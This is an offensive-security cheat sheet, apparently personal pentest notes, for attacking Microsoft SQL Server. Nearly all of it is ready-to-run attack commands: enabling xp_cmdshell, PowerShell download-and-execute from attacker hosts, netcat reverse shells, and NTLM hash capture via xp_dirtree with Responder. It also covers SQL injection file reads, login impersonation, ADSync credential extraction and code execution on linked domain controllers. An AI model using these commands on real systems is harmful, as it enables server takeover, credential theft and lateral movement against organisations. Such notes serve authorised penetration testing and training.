MSSQL
Login to MSSQL Server with SQSH
sqsh -S $IP -U sa -P <password>
> EXEC SP_CONFIGURE 'show advanced options',1;reconfigure
> EXEC SP_CONFIGURE 'xp_cmdshell',1;reconfigure
> xp_cmdshell "whoami"
> goReverse Shell with Powershell
> xp_cmdshell "powershell IEX(New-Object Net.webclient).downloadString('http://10.10.x.y/reverse.ps1')"
> goPowershell use Nishang payload
checking the compromised computer:
powershell -exec bypass
# import module
. .\GetUserSPN.ps1collect:
SAMAccountName
Service Principal Name
MSSQL Auth
Builtin\Users
sa (service account)
Do you have a valid creds?
mssqlclient.py manager/operator:operator@manager.htb -windows-auth
# myssqlclient.py <domain>/<user>:<pass>@<full domain> -windows-authEnumeration for PrivEsc
Do you have access to the machine with mssql?
sqlcmd -Q "select * from sys.databases"
sqlcmd -Q "select name,create_date from sys.databases"Using PowerUpSQL
# download and import
PS> IEX(New-Object Net.WebClient).downloadString("http://<attacker ip>:<port>/PowerUpSQL.ps1")
Invoke-SQLAuit -VerboseCapturing the NTLM Hash
Make sure you have access to command xp_dirtree in the sqlcmd.
# setup responder
sudo responder -I tun0
# call the attacker IP inside the sqlcmd
sqlcmd -Q "xp_dirtree '\\<attacker ip>\test'"
MSSQL Read File
Permissions: The BULK option requires the ADMINISTER BULK OPERATIONS or the ADMINISTER DATABASE BULK OPERATIONS permission.
-1 union select null,(select x from OpenRowset(BULK 'C:\Windows\win.ini',SINGLE_CLOB) R(x)),null,nullRCE with MSSQL
EXEC xp_cmdshell "net user";
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';
EXEC xp_cmdshell "powershell IEX(New-Object Net.webclient).downloadString('http://10.10.x.y/reverse.ps1')"
# reverse shell
#power.ps1
iwr http://10.10.16.2/nc.exe -outfile c:\windows\tasks\nc.exe;
c:\windows\tasks\nc.exe -e powershell.exe 10.10.16.2 12345
EXECUTE AS LOGIN = 'sa';
EXEC xp_cmdshell "powershell -ep bypass iex(iwr http://10.10.16.2/power.ps1 -usebasicp)";
# rlwrap nc -lvnp 12345If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;There is Azure AD and DCSync?
ref: https://blog.xpnsec.com/azuread-connect-for-redteam/
sqlcmd -Q "Use ADSync; select private_configurateion_xml,encrypted_configuration FROM mms_management_agent"
# download the code as decrypt.ps1 and make sure you change the Data Source.
IEX(New-Object Net.WebClient).downloadString('http://<attacker ip>:<port>/decrypt.ps1')
Check Ability to Impersonate User
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'EXECUTE AS LOGIN = 'sa';
EXEC sp_configure 'show advanced options',1; reconfigure;
EXEC sp_configure 'xp_cmdshell', 1; reconfigure;
EXEC xp_cmdshell 'powershell -c "C:\Windows\Tasks\nc.exe -e cmd 10.10.x.y 443"'impersonate dbo (db owner)
use msdb; EXECUTE AS USER = 'dbo';Check Linked Server with MSSQL
EXEC sp_linkedservers;
# if linked to DC you could query accoss from current sql server
SELECT version FROM OPENQUERY("DC01", 'SELECT @@VERSION AS version');
SELECT myuser FROM OPENQUERY("DC01", 'SELECT SYSTEM_USER AS myuser');
# execute the RCE at dc01
EXEC ('sp_configure ''show advanced options'',1; reconfigure;') AT dc01
EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT dc01
EXEC ('xp_cmdshell ''powershell -enc <base64 powershell>'' ') AT dc01MSSQL query problem with quote, so using base64 encode command is best options.
reference:
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md
Last updated